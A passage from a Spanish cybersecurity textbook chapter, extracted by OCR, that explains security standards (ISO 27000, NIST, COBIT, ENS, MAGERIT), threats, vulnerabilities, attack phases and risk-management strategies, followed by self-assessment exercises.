auditorías. Comienza con el análisis de riesgos para determinar qué controles son
los más importantes para la organización y cómo se deben aplicar. Se centra en la
fase de "planificación y organización" del ciclo del programa de seguridad.
ISO 27002 se encarga de definir controles de seguridad generados como sali-
da o resultado del análisis de riesgo realizado con ISO 27001. Este estándar es una

- 14 -
Capitulo l . LA SEGURIDAD INFORMÁTICA

referencia completa de todos los elementos que una organización puede aplicar en
materia de seguridad. Puede verse como un conjunto de buenas prácticas que cada
organización puede utilizar y decidir cómo aplicarlas a sus procesos de negocio.
Puede entenderse como la fase de "acción" del programa de seguridad.
ISO 27003 se concentra en proporcionar recomendaciones y buenas prácti-
cas para implementar la gestión del ISMS definido en el ISO 27001, es decir, en cómo
implementar el programa de seguridad. Podría verse como la fase de "comproba-
ción" o "evaluación" para el ciclo de un programa de seguridad.
ISO 27004 cubre las medidas para garantizar la efectividad de la implementa-
ción. Se correspondería con una fase de "monitorización y evaluación" o "actualiza-
ción" para el programa de seguridad.
ISO 27005 define el marco de gestión de los riesgos para la seguridad de la
información que puede utilizarse para informar y analizar las decisiones tomadas
según los controles definidos por el estándar ISO 2 7002.
ISO 27006 es un estándar que proporciona guías para las organizaciones pro-
fesionales que no necesitan tener una certificación claramente acreditada.

Esta familia de estándares sugiere que los elementos relacionados con la


seguridad en una organización deben ser comprendidos tanto en un contexto
interno como externo y deben basarse en las necesidades y expectativas de
las partes interesadas. Para ello introduce el concepto de "sistema de gestión
de la seguridad de la información".
Un sistema de gestión de la seguridad de la información (ISMS, Infor-
mation Security Management System), de acuerdo con el estándar ISO 27000
(cláusula 3.2.1) es una aproximación sistemática para establecer, implementar,
operar, monitorizar, revisar, mantener y mejorar la seguridad de la información
en una organización para lograr los objetivos de negocio. Se basa en una eva-
luación del riesgo y ciertos niveles de aceptación del riesgo por parte de la or-
ganización diseñados de forma efectiva para gestionar y manejar los riesgos.
El estándar 27001:2013 no sugiere ninguna organización concreta en capas,
ni siquiera una aproximación basada en capas. Sin embargo, ofrece una guía para
la creación de diversos elementos estructurales para la implementación de un pro-
grama de seguridad de la información efectivo, mediante cláusulas de control. En
concreto, se sugieren 35 objetivos de control, 114 controles y una guía clara en el
estándar 27002:2013.

Como puede observarse, la familia ISO 27000 permite entender cómo


se realiza una aproximación profesional al problema de la seguridad de los
sistemas de información.
Para profundizar y estar actualizados en la seguridad de los sistemas de
información debe acudirse a organismos u organizaciones de confianza y de

- 15 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOG.t.A INFORMÁTICA

reconocido prestigio. Entre ellas destaca el NIST (National Institute of Stan-


dars and Technology, Instituto Nacional de Estándares y Tecnologías) y sus
publicaciones, en especial la serie NIST Special Publication 800-39 (junto con
800-53). El NIST proporciona un conjunto de publicaciones especiales para
ayudar a la industria, el gobierno y las organizaciones académicas a seguir
un conjunto de buenas prácticas relacionadas con distintas tecnologías. En
concreto, la conocida "serie 800" es un conjunto de publicaciones orientadas
a la seguridad, en general asociadas a tecnologías concretas. Entre las tecno-
logías para las que existen guías destacan las realizadas para móviles, Blue-
tooth, servicios web, RFID, IPSec, IDPS, ... En 2015, se lanzó la serie de guías
800 orientada a la ciberseguridad con el objetivo de ofrecer buenas prácticas
desde un punto de vista más práctico, con el fin de facilitar la adopción de
estándares de seguridad. Dos recomendaciones abordan la seguridad en las
instituciones, la 800-53 orientada hacia los controles de seguridad derivados
del análisis de riesgos en una organización y la 800-39 dedicada a la gestión
de los riesgos de seguridad en los sistemas de seguridad.
Esta última proporciona una guía en la integración de gestión de riesgo en un
amplio espectro de organizaciones. La 800-53 fue desarrollada para el gobierno de
los Estados Unidos de América con el objetivo de especificar la seguridad a nivel de
estructura y control de la organización, las líneas base para el desarrollo de con-
troles de seguridad, los controles más habituales, los controles de seguridad en en-
tornos externos, la verificación de controles de seguridad, la gestión de riesgos, la
categorización de sistemas de la información y monitorización de los controles de
seguridad.

Como puede observarse, tanto la guía 800-39 como la 800-53 propor-


cionan una visión muy completa del ámbito que la seguridad debe abarcar.
En el contexto de la gestión de los sistemas de información es imprescin-
dible destacar también el estándar más conocido a nivel global en el ámbito
de las tecnologías de los sistemas de información: COBIT (Control Objectives
for Information and related Technologies). Fue publicado por ISACA, (Infor-
mation Systems Audit and Control Association). lSACA es una organización in-
dependiente de gobiernos, centrada en los sistemas de información. COBIT
se define como una guía para la gestión de sistemas de información que per-
miten definir y gestionar los procesos en una organización basándose en un
modelo de madurez. Inicialmente, COBIT no se centra en la seguridad infor-
mática, pero incluye directrices y guías de más alto nivel que los estándares
comentados anteriormente, orientadas a garantizar buenas prácticas a nivel
de seguridad alineadas con los objetivos de la organización.
Sin embargo, en 2012 ISACA publicó "COBIT 5 para la seguridad de
la información", actualizando la última versión de su estándar con el fin de

- 16 -
Cap!tul a l . LA SEGURIDAD IN P RMÁTl A

proporcionar una guía para la seguridad de la empresa, en todos sus nive-


les prácticos. COBIT 5 es el modelo de gobernanza más conocido y extendido
para las organizaciones con sistemas de información.
En España desde el año 2010 es obligatorio el sistema de gestión deno-
minado ENS (Esquema Nacional de Seguridad). El sistema ENS establece la
política de seguridad de la información de la Administración Pública en Espa-
ña, conforme al Real Decreto 3/2010. Define los principios básicos de seguri-
dad, los requisitos mínimos para proteger la información, categoriza los sis-
temas en nivel alto, medio o bajo, proporcionando un catálogo de 75 medidas
de seguridad. Los documentos de desarrollo (CCN-STIC) conforman normas
de procedimiento emitidas por el Centro Criptológico Nacional.
Por último, es importante destacar una metodología española para la
gestión de riesgos para la seguridad de la información, en la que la Adminis-
tración pública ha realizado un esfuerzo importante: MAGERIT, acrónimo de
Metodología de Análisis y Gestión de Riesgos de los Sistemas de Información.
La versión 3 de esta metodología es la actualización de 2012, fruto de la torna
de contacto con las metodologías surgidas en los últimos años, corno la ISO
27000 y otras iniciativas relacionadas.
MAGERIT ha sido la base de herramientas de apoyo informático corno es
el caso de la aplicación PILAR, apoyada por el Centro Criptológico Nacional, la
aplicación GxSGSI, que ha sido homologada por la Agencia Europea de Segu-
ridad de la Información (ENISA), la herramienta argentina R-Box o SECITOR,
que incluye MAGERIT además de otras metodologías corno ISO 27000 pura-
mente, ENS (Esquema Nacional de Seguridad), etc.

III. AMENAZAS, VULNERABILIDADES, ATAQUES (HACKING) Y GESTIÓN DE


RIESGOS

l. Amenazas

Una amenaza es alguna circunstancia, evento o persona que puede im-


plicar riesgo para la información, los recursos, los usuarios o los datos.
Según Symantec, empresa especializada en seguridad de la información
y conocida por sus productos antivirus, "una amenaza informática es toda
circunstancia, evento o persona que tiene el potencial de causar daño a un
sistema en forma de robo, destrucción, divulgación, modificación de datos o
denegación de servicio (DoS)".

- 17 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

Según la norma X.1205 de la ITU-T, las amenazas son en esencia el com-


ponente que define la evaluación ponderada de un riesgo de seguridad. Por
eso, es importante estudiar las amenazas, analizarlas, describir el tipo de po-
sibles ataques que implican, los agresores potenciales, los métodos y conse-
cuencias para que estas amenazas tengan éxito.
Se denomina vectores de ataque a los métodos o maneras en que una
amenaza se utiliza para atacar un sistema.
Una primera clasificación de las amenazas puede realizarse en función
del origen de las mismas, dividiéndolas en internas y externas. La Tabla 1
muestra esta clasificación detalladamente.

Tabla 1
Principales amenazas externas e internas de una organización

Fraude o uso fraudulento de la información.


Errores o malentendidos de los empleados
Espionaje
Ingeniería social sobre los empleados
Uso de contraseñas débiles
Robos
Políticas no aplicadas o ignoradas.
Uso de medios no autorizados o descargas
de Internet no permitidas.
' Realización de tareas que no corresponden
al empleado
Amenazas tecnológicas
Entradas no válidas.
s Configuraciones erróneas o no adecuadas
de las aplicaciones que conllevan asociados
errores de procesamiento.
Gestión inadecuada de errores o excepciones
que pueden derivar en problemas
Manipulación de parámetros de
configuración o de desbordamientos de
buffer
Amenazas físicas

- 18 -
Capitulo l. LA SEGURIDAD INFORMÁTICA

Acceso no restringido a unidades USB que


pueden desembocar en corrupción de la
información.
Corrupción de datos o sistemas debida
a picos de tensión, fallos de control de
temperatura u otras razones consecuencia de
la manipulación del contexto de los sistemas.
Fallo del hardware debido a un funcionamiento
erróneo.
Mantenimiento inadecuado de unidades de
respaldo (UPS) .

Habitualmente, se utilizan los adjetivos "activas" o "pasivas" para des-


cribir las amenazas que provoquen, o no, una alteración en la información,
respectivamente. Términos que se utilizan asimismo para amenazas al estado
de los sistemas o de cualquier parte de su funcionamiento.
Ej . 1.3: La interceptación de las comunicaciones o escuchas son típicas
amenazas pasivas, mientras que la suplantación o spoofing supone un envene-
namiento activo en las comun icaciones entre usuarios que permite escuchar y
modificar la información en una red.

La evolución de las ciberamenazas se va acelerando año tras año, no solo


porque la sociedad utiliza cada día más las tecnologías, sino también porque
las amenazas son más sofisticadas. Las amenazas no siempre siguen un único
vector de ataque, sino que pueden mutar y realizar cambios automatizados,
constituyendo lo que se llama amenazas polimorfas. Con ello, pretenden elu-
dir las herramientas de defensa de los sistemas seguridad de la información
de las organizaciones.

- 19 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

Las amenazas de gran envergadura, dirigidas por grandes organizacio-


nes o grupos criminales de forma continua, con objetivos específicos, gene-
ralmente asociadas a técnicas de ataque con código malicioso, se suelen de-
nominar APT (Advanced Persistent Threat), o amenaza persistente avanzada.
El modelo de amenaza de la información representa simbólicamente los
cuatro estereotipos de amenazas posibles y que, en general, van a ser la base
de cualquier otra amenaza más sofisticada.
El flujo normal de la información en una red de ordenadores consiste en
que desde una fuente u origen se transmite una serie de paquetes de datos
que recibe un destinatario. Así podemos encontrarnos los siguientes tipos de
amenazas:
a) Se define la "interrupción" como aquella amenaza típica que afecta a
la disponibilidad de la información.
b) La amenaza que implica la monitorización pasiva de la información
entre dos interlocutores, se denomina "interceptación".
c) La "modificación" es la amenaza que consiste en interrumpir la co-
municación, monitorizarla y retransmitir la misma con posibles
cambios. A esta amenaza tipo se la suele asociar con el nombre de
"hombre-en-el-medio", Man-in -the-middle o por las siglas MITM.
d) Por último, la "fabricación" consiste en directamente confeccionar
paquetes de datos sin relación alguna con el emisor y su trasmisión
hacia el receptor.
Una amenaza en un contexto real puede seguir un patrón como los expues-
tos, o bien ser una composición de uno o varios de estos estereotipos básicos.

2. Vulnerabilidades

Una vulnerabilidad es un punto débil en algún elemento del sistema de


información, como por ejemplo en el software, en la configuración del siste-
ma, etc., a través del cual, si no se soluciona pronto, un intruso puede lograr
acceso al equipo, aplicación o red y causar perjuicios.
Como tal, permite a un atacante comprometer la seguridad de la infor-
mación, es decir, afecta a las dimensiones de confidencialidad, integridad y
disponibilidad de los sistemas de gestión de la información.
Formalmente la ITU-T X.1205, define la vulnerabilidad como aquel
punto débil que puede ser explotado por un agresor. Puede ser un punto
débil inherente a la construcción tecnológica del sistema o bien derivado

- 20 -
Capitulo l. LA SEGURID RMATI A

de una mala configuración que provoca un funcionamiento inadecuado del


sistema.
Las amenazas suelen aprovecharse de las vulnerabilidades para crear
riesgos que permiten la exposición de los activos. Pueden asociarse con apli-
caciones, sistemas operativos, configuración o instalación de paquetes de ter-
ceros o un fallo en la red.
Ej. 1.4: Como ejemplo ilustrativo supóngase que se deja la puerta del do-
micilio abierta cuando uno se ausenta. El sistema es el domicilio y dejar la puer-
ta abierta al salir es un punto débil del sistema. No se ha configurado bien el cie-
rre. Existe la posibilidad de que surja una amenaza de que roben en el domicilio
y en función de la probabilidad de que esto ocurra, existe un riesgo inminente
de que un ladrón entre y robe con un impacto determinado en función del valor
de lo robado. Siempre hay liesgo de que roben en el domicilio pero si hay una
vulnerabilidad en el cierre, el riesgo aumenta.

Las vulnerabilidades se crean como propiedades de los mismos siste-


mas de información porque son igualmente parte del proceso de fabricación
del hardware y del software.
Cuando los sistemas de información están en producción, las vulnerabi-
lidades pueden ser descubiertas, difundidas o publicadas, y ser aprovechadas
por terceras personas (como hackers, técnicos de empresas de la competen-
cia, ciberespías, etc.). Una vez que son aprovechadas se dice que la vulnerabi-
lidad se ha explotado, una expresión que es habitual utilizar en esta temática
y que también se utiliza cuando se habla de amenazas.
Cuando la vulnerabilidad se ha explotado el riesgo ha aumentado. Sin
embargo, el nivel de riesgo máximo se alcanza cuando se desarrolla el parche
o hotfix, que se publica para que los sistemas sean corregidos. El motivo prin-
cipal es que una vez el parche de seguridad es de dominio público, cualquier
persona puede conocer el problema de seguridad con exactitud haciendo un
detenido estudio del código del parche. En ese momento, los sistemas sin ac-
tualizar son los más vulnerables de todos. Por ello, es necesario atender a la
difusión de esos parches, ya que es la forma de estabilizar el nivel de riesgo de
nuestros sistemas de información.
En el transcurso del proceso desde que se descubre la vulnerabilidad
hasta que se publicita existe un momento en el que la vulnerabilidad es co-
nocida por el investigador de seguridad, pero aún no se ha hecho pública. A
esta vulnerabilidad se la denomina vulnerabilidad pre-zero-day. Se entiende
por investigador de seguridad a aquel que se dedica a analizar la seguridad
de los sistemas informáticos independientemente de su objetivo. Pueden ser

- 21 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

miembros de la seguridad de Estados o empresas, sujetos que pertenecen a


organizaciones de ciberdelincuencia, estudiantes, etc.
En un momento determinado se dice que se hace pública, pero no debe
entenderse en el sentido de una publicidad general. En ocasiones el investi-
gador comunica al propio desarrollador del sistema o fabricante la vulnerabi-
lidad con el fin de que este la corrija.
Ej. 1.5: La NSA (National Security Agency) analiza sistemáticamente los
sistemas operativos de los proveedores buscando vulnerabilidades. Cuando las
encuentra las comunica a la empresa que desarrolla el producto y esta desarro-
lla los parches (software) que las corrigen y se envían a todos los sistemas ope-
rativos instalados. De ahí la importancia de que los consumidores realicen las
actualizaciones enviadas por los proveedores, especialmente las de seguridad.

Sin embargo, a menudo el investigador de seguridad busca alguna com-


pensación, momento en el que comienza el debate sobre las formas en que la
vulnerabilidad se publica. Existen organizaciones que se dedican a comprar
vulnerabilidades no publicadas para utilizarlas o venderlas a terceros en un
mercado negro de vulnerabilidades.
Una vez llegado a un acuerdo, económico o de otra índole, el punto débil
se convierte en vulnerabilidad de día cero o de tipo zero-day. Tras cierto pe-
ríodo de tiempo acordado, el investigador de seguridad difunde abiertamen-
te la vulnerabilidad, en ocasiones ofreciéndosela antes a las organizaciones
responsables o desarrolladores para que puedan ir iniciando el procedimien-
to de actualización, la fabricación de parches y estudiar los riesgos asociados
alrededor de la vulnerabilidad.
Ej. 1.6: Charlie Miller, que fue analista de seguridad de la NSA, junto con un
compañero hackearon en 2015 la unidad central de algunos modelos de auto-
móviles Chrysler que incorporaban un sistema informático. Podían cambiar el
volumen del audio o el aire acondicionado, pero también podían hacer que los
frenos no funcionasen o incluso manejar el volante desde cientos de kilóme-
tros de dis tancia. Podrían haber hackeado un millón de coches. Informaron a
Chrysler y estuvieron 9 meses desarrollando el parche. Cuando lo empezaron a
hacer público Chrysler solucionó la vulnerabilidad en una semana. Ni Miller ni
su compañero recibieron nada a cambio de la información. Sin embargo, un año
después Chrysler comenzó a ofrecer recompensas para hackers que encontra-
sen vulnerabilidades en su software (programa de "bug bounty hunter").

Ej. 1.7: En la conferencia CAN SEC WEST en Vancouver se realiza una com-
petición para encontrar vulnerabilidades en software muy utilizados como Ado -
be Flash o Safari, el ganador puede recibir más de 140.000 $.

- 22 -
Capitulo l . LA SEGURIDAD INFORMÁTICA

Ej. 1.8: Existen páginas web en las que se pueden comprar vulnerabilidades
que tienen parche, pero se compran porque la mayoría de los parches no se insta-
lan debido principalmente a que el software no se ha comprado legalmente.

Estadísticamente la mayoría de las vulnerabilidades que luego se ex-


plotan son de una alta peligrosidad (prácticamente el 80%). Sin embargo, un
porcentaje relativamente bajo no tiene impacto (el 1.5%).
La investigación de vulnerabilidades supone en definitiva un esfuerzo
internacional donde se promueven las alianzas entre grandes fabricantes de
tecnología y los diferentes gobiernos para conseguir mejorar la seguridad de
la información en general. Existen todo tipo de iniciativas para promover y
fomentar alianzas globales para investigar vulnerabilidades tales como cor-
poraciones formadas por centros de investigación y empresas como Mitre,
gubernamentales como NVD (National Vulnerability Database) de Estados
Unidos, o portales informativos específicos como Security Focus de Symantec.
Un campo especialmente delicado lo componen las vulnerabilidades en
las aplicaciones web. El consorcio Web Application Security (WASC), formado
por empresas, universidades y expertos en seguridad a nivel internacional,
ha diseñado un proyecto muy interesante para mejorar la seguridad median-
te elframework OWASP (Open Web Application Security Project). Como parte
de este proyecto se han redactado buenas prácticas, herramientas, documen-
tos, código y recomendaciones para la seguridad de las aplicaciones web que
son uno de los sectores con mayor despliegue dentro de las TI.
Finalmente, debe destacarse una vulnerabilidad siempre difícil de gestio-
nar, la vulnerabilidad humana. Los errores en los cambios de los sistemas, la con-
figuración y las instalaciones dependen del factor humano, al igual que las tareas
de desarrollo. Si bien podemos pensar que no se pueden parchear las debilidades
humanas, sí es cierto que la capacitación, la motivación y otros factores relacio-
nados con ámbitos del conocimiento amplios, desde la psicología a la administra-
ción de empresas, pueden ayudar a comprender y mejorar este fenómeno.

3. Ataques (hacking)

Un ataque tiene lugar cuando un sistema está comprometido por un ex-


ploit desconocido que explota alguna de sus vulnerabilidades, siendo un ex-
ploit un script o programa, o una tecnología o incluso ciertos datos sensibles,
que permiten a un atacante obtener ventaja de una vulnerabilidad.
Un exploit puede lograr obtener acceso no autorizado a un ordenador o
a una red. Como consecuencia puede causar la denegación de un servicio, el

- 23 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

robo de información sensible o causar algún daño temporal o permanente en


la organización. En ocasiones los exploits no superan un par de líneas de códi-
go. En muchos casos los hackers no programan sus propios exploits sino que
utilizan herramientas creadas por otros hackers más experimentados.
Se define el malware como cualquier programa que ha sido creado con
la intención de causar daño, robar datos o abusar de los recursos del sistema.
En esta definición se incluyen virus, gusanos y troyanos.
Por último, cualquier sitio web o servicio web puede verse comprome-
tido por cibercriminales y ser un punto de acceso para atacar los datos de la
organización. Los cinco métodos más comunes de ataque web son:
• inyección SQL;
• cross-site scripting;
• cross-site request forgery;
• uso de componentes con vulnerabilidades conocidas;
• ataques man-in-the-middle.
Los hackers (atacantes) suelen buscar las vulnerabilidades de un siste-
ma para lograr acceder al mismo.
Con frecuencia se utilizan los términos hacking y hacking ético (ethical
hacking). Ambos tipos de hacking funcionan de manera similar pero es la in-
tención que persigue cada uno lo que los diferencia.
Hac;king es el conjunto de habilidades que permiten la exploración de
brechas de seguridad así como la publicación de contenidos en sitios web,
robo de datos, etc., haciendo uso de exploits y vulnerabilidades.
Cada hacker puede estar motivado por diversas razones. Casi siempre
se asocia el concepto de hacking con delitos o actividades criminales, es decir
con una intención perniciosa, aunque no necesariamente quien ilícitamente
accede a un sistema informático ajeno tiene la intención de causarle un per-
juicio.
Dentro de la seguridad, el rol del atacante (hacker) es más sencillo que
el del defensor. Un atacante solo necesita una vulnerabilidad para tener éxi-
to, mientras que el defensor debe cubrir todas las posibles vulnerabilidades.
Además, los atacantes suelen no tener que ajustarse a normativas o leyes, uti-
lizando caminos inusuales, abusando de la confianza en el sistema o aplican-
do técnicas destructivas. Sin embargo, el defensor debe mantener los recur-

- 24 -
Capitulo l. LA SEGURIDAD INFORMÁTICA

sos intactos, minimizando el impacto de los ataques, manteniendo los costes


bajos y cumpliendo la ley.
Es importante tener en cuenta que un ataque se realiza en general en
varias fases.
a) Como se indicó anteriormente, una amenaza se describe por un mé-
todo que se denomina vector de ataque. En primer lugar, se realiza
una fase de obtención de información, también denominada foot-
printing. Si la obtención de información es relativamente agresiva,
existen salvaguardas que permiten la detección temprana de este
tipo de ataques, como son los sistemas de prevención de intrusio-
nes (IPS) o los cortafuegos (firewalls).
b) Una segunda fase es la enumeración de vulnerabilidades, para lo
cual el atacante realiza un trabajo de estudio de los defectos que
pueden tener los sistemas detectados en la fase anterior.
c) En tercer lugar, el ataque persigue conseguir el anonimato. Para ello
se utilizan elementos que oculten su dirección IP.
Ej. 1.9: Por ejemplo mediante el uso de servidores intermedios de-
nominados proxies anónimos, o el uso de equ ipos zombis infectados per-
tenecientes a alguna red botnet, o incluso preparando un conjunto de
herramientas en el argot conocidas como rootkits, que tras la intrusión
permitan borrar los rastros del ataque.

d) A continuación viene la rotura del sistema, que es la fase final del


ataque, que es cuando se dice que "explota". A las utilidades in-
formáticas para realizar esta fase se les suele denominar exploits.
Como consecuencia de esta explotación de la amenaza surge un in-
cidente de seguridad.
La gestión de los incidentes de seguridad es una actividad muy impor-
tante en los sistemas de gestión de la seguridad de cualquier organización
y da origen a una ciencia denominada informática forense, que investigará
detalladamente lo que ha ocurrido una vez el ataque se haya consumado.
En este contexto es importante reflexionar sobre la evolución histórica de
los ataques y su consideración social. Durante los años finales del siglo XX toda-
vía se veían las ciberamenazas desde un punto de vista bastante romántico. La
etapa romántica se caracterizaba por la estimación social del hacker cuyo ideal
era superar retos intelectuales y que se permitía romper sistemas de informa-
ción de organizaciones por el gusto de ampliar sus conocimientos técnicos.

- 25 -
Ci bercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOG1A INFORMÁTICA

Sin embargo, con la llegada de los primeros ataques relacionados con el


engaño masivo mediante correos electrónicos, conocido como phishing, se co-
mienza a extorsionar y perjudicar a cualquier persona. A esta época de prime-
ros fraudes durante la primera década del siglo XXI, se le sumaron los primeros
gusanos que tumbaban sistemas aprovechando defectos en los mismos.
Ej. 1.10: Como fue el caso del gusano Blaster, en 2003, programado para
realizar un ataque organizado de denegación de servicio.

Hacia finales de la década y ya durante la segunda de este siglo, el des-


pliegue de amenazas basadas en código malicioso, particularmente troyanos,
aumenta y además son más sofisticados. Se forman APTs y redes de ordenado-
res infectados denominados zombis bajo el dominio de un hacker que ejerce el
mando y control, lo que se ha denominado redes botnets. Con todo ello, en la
actualidad los hackers constituyen un problema y una preocupación social.

4. Gestión del riesgo

Cada amenaza identificada, asociada a vulnerabilidades existentes, debe


analizarse y se deben desplegar medidas de seguridad que garanticen la ges-
tión del riesgo asociado. El análisis SWOT (Strength, Weakness, Opportunity
y Threats, en español análisis DAFO) indica los cuatro principales puntos de
análisis de una amenaza de seguridad: fortaleza, debilidad, oportunidad y
amenazas.
Generalmente, el primer paso para analizar un riesgo es definir la ex-
posición. La exposición a una amenaza se define como el impacto que puede
causar el riesgo. Debe tener en cuenta las habilidades necesarias para llevar a
cabo el ataque, la probabilidad de que un ataque tenga lugar, el daño que cau-
saría este ataque a todos los niveles y los recursos o controles que presentan
debilidades que permitirían acceder al ataque.
La probabilidad de un ataque se define como la posibilidad de que una
amenaza o una vulnerabilidad puedan convertirse en un riesgo real y ser
explotado. El impacto del riesgo se mide mediante la cantidad de daño que
causa este ataque. Para determinar la probabilidad de un ataque debemos
responder a las siguientes cuestiones:
• ¿Qué habilidades debe poseer una atacante para realizar el ataque
con éxito?
• ¿Cuáles podrían ser los principales beneficios y/ o motivaciones de
un atacante?

- 26 -
Capitulo 1. LA SEGURIDAD INFORMÁTICA

• ¿Cuáles son los requisitos de acceso a los recursos afectados por el


ataque?
• ¿Es fácil de descubrir la vulnerabilidad? ¿Es una vulnerabilidad bien
conocida por el sector de la seguridad?
• ¿Existe algún software exploit para esa vulnerabilidad disponible en
Internet?
• ¿Se podría detectar el ataque si tuviera lugar?
Para averiguar el impacto de un ataque debernos responder a las si-
guientes cuestiones:
• ¿Cómo de sensible es la información que se podría desvelar?
• ¿Se produciría la perdida de la integridad de los datos o su disponi-
bilidad?
• ¿Se puede rastrear el origen del ataque?
• ¿El ataque implicaría pérdidas económicas o de reputación?
• ¿Quién podría verse afectado por la pérdida? ¿Quién podría perca-
tarse?
• ¿Existen datos sensibles bajo el riesgo de ser expuestos?
Tras reconocer estos parámetros se suelen ordenar los riesgos de más
probable a menos probable junto con su impacto. Después se debe identificar
qué contrarnedidas se deberían aplicar, qué controles de seguridad ya desple-
gados deberían detectarlo, o bien qué nuevas métricas deben analizarse. Es
decir, debe crearse un plan de respuesta para cada riesgo.
Las estrategias de respuesta ante un riesgo varían según el tipo de ries-
go, así corno el nivel de impacto asociado. Sin embargo, suelen incluirse en
cuatro grupos de estrategias:
a) Evitación. Esta estrategia se centra en reducir la probabilidad de
ocurrencia del ataque cerca a cero o eliminarla completamente. Es
casi imposible alcanzar este nivel solo mediante medidas de seguri-
dad. El único modo viable es eliminar la causa del ataque.
Ej. 1.11 : Por ejemplo, si la amenaza es el acceso a redes sociales, el
único modo de evitar el ataque es bloqueando el acceso a las redes socia-
les en toda la organización.

No siempre es posible eliminar el origen de la amenaza o bien es de-


masiado caro implementar los mecanismos que eliminen el origen
de la amenaza.

- 27 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGíA INFORMÁTICA

b) Transferencia. Sucede cuando se transfiere la gestión del riesgo a otra


entidad, como una aseguradora o una proveedora de servicios, donde
son ellos responsables al 100% del impacto que cause un ataque.
c) Mitigación. Esta estrategia se centra en utilizar controles de seguri-
dad para protegerse contra un riesgo hasta que el impacto del riesgo
es minimizado hasta niveles aceptables por la organización. General-
mente se suele establecer un valor numérico de tolerancia específica
para cada organización. La mitigación de los riesgos suele ayudar a
reducir el impacto hasta ese umbral o por debajo del mismo.
d) Aceptación. La organización decide aceptar el nivel de riesgo actual
sin realizar ninguna otra contramedida.
Las salvaguardas son controles que sirven como mecanismos de protección
de los activos de nuestros sistemas.
Como primer paso, es fundamental conocer mejor los activos y sus ca-
tegorías, identificar los controles relacionados con los recursos humanos y
entender la aplicabilidad de las salvaguardas. La declaración de aplicabilidad
de las medidas de seguridad va a depender de varios factores, entre ellos, del
daño que pueda causar un problema en un activo, del presupuesto y del valor
del mismo.
Aplicando de forma sistemática la ISO 27001 se puede conseguir un ni-
vel gestionado de la seguridad, es decir, un nivel de riesgos aceptable.
Como ya se indicó, la norma concreta en su sección 27002 detalla todos los
controles disponibles y que son los que se deberán tener en cuenta para proteger la
seguridad de la información de cualquier organización. Así, en la última revisión de
la ISO, se catalogan 114 controles de seguridad.

En el Esquema Nacional de Seguridad (ENS), para los sistemas de tipo gu-


bernamental, se ha definido un catálogo de 75 controles de seguridad, de los
cuales los responsables de los distintos organismos públicos deben seleccionar
los más adecuados para la protección de los sistemas de información públicas.
Para determinar las medidas de seguridad sobre activos es necesario pre-
cisar qué es un activo. En general, puede definirse como aquella entidad que tie-
ne valor para la organización y por consiguiente debe ser objeto de protección.
La norma UNE 71504, define activo como el componente o funcionalidad de un
sistema de información susceptible de ser atacado deliberada o accidentalmente
con consecuencias para la organización. Hay distintas clasificaciones de activos, a
nivel conceptual habitualmente son de cuatro tipos: activos de información, acti-
vos físicos, activos de servicios y activos humanos.

- 28 -
Capítulo l . LA SEGURIDAD INFORMÁTICA

El estándar español MAGERIT, clasifica los activos de esta manera por


ámbitos:
• [D] Datos: Datos que materializan la información.
• [S] Servicios: Servicios que se necesitan para el sistema.
• [SW] Software: Las aplicaciones informáticas.
• [HW] Hardware: Los equipos informáticos sobre los que trabajan los
datos, aplicaciones y servicios.
• [MEDIA] Soportes de información, como los dispositivos de almace-
namiento de datos.
• [AUX] Equipamiento auxiliar, que complementa el material informá-
tico.
• [COM] Redes de comunicaciones.
• [L] Instalaciones.
• [P] Personal: relacionadas con la explotación y operación de los acti-
vos que se han mencionado.
Un número importante de medidas relacionadas con los recursos huma-
nos lo constituyen aquellas relacionadas con la protección de datos perso-
nales. En concreto, derivado de la Ley Orgánica de Protección de Datos y del
Reglamento Europeo de Protección de Datos, en España existen una serie de
mecanismos obligatorios en este sentido recogidos en Reales Decretos.
Ej. 1.12 : Desde el 2007 con el art. 89 del Real Decreto 1720/2007, se esta-
blecen normas sobre las funciones y obligaciones de los usuarios o perfiles con
acceso a datos personales y a los sistemas de información que las manejan.

Otro aspecto importante es la selección de salvaguardas. Los controles


o salvaguardas de los sistemas de información se toman de entre los disponi-
bles y clasificados según el estándar de gestión de la seguridad (ISO 2 7002,
ENS, etc.). Sobre ellos, se realiza una declaración de aplicabilidad, es decir,
una selección de las salvaguardas basada en criterios de riesgo, gasto y valor
de los activos.

- 29 -
Cibercriminalídad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

CONCEPTOS CLAVE
;j,

M
.. , >ff cí , .
de la~•'.seguridad,
$
li6ades,"'1nci. i:l, ·impactos, .rlies;,,
médi~as 'de,,se 1 · • c0n enc¡~i~ad, ¡~tegri- · ·
_idad, trazabili · , . · . undidad, d-efonsa .
q"tie, amenazas . ,. aia persjstente avan: .
et ero·day,_par , , • · oit, 'mdlw!re.hackíng,
:ng,
exposición, evitación, transferencia, ación, in-
!2rmáti · e;•itíe_i .eqte de s~guridad. . · .
«~ > ::~~

EJERCICIOS DE AUTOEVALUACIÓN
l. Indique tres ventajas de la estandarización.
2. Defina ciberseguridad y señale qué particularidad la diferenciaría de la seguri-
dad en las TIC.
3. Explique las fases de un ataque a la seguridad informática.
4. Explique la diferencia entre vulnerabilidad y amenaza.
5. Se ha producido un ataque a una empresa y el investigador recibe un informe
forense en el que se indica que la empresa está certificada cumpliendo el están-
dar 27001. Indique si es suficiente garantía para desestimar que la vulnerabili-
dad explotada no se debe a sus sistemas de información y por qué.
6. En una mediana empresa se actualizan los sistemas operativos de forma pro-
gramada cada semana. Indique si este hecho constituye una vulnerabilidad,
amenaza o riesgo. Valore en qué casos es una medida acertada y en cuáles no.
7. Un hospital dispone de un servidor central con la información y datos médicos de
todos sus pacientes en el sótano y mantiene un servidor con copia de seguridad
en la misma sala del sótano. Indique si este hecho constituye una vulnerabilidad,
amenaza o riesgo. Valore en qué casos es una medida acertada y en cuáles no.
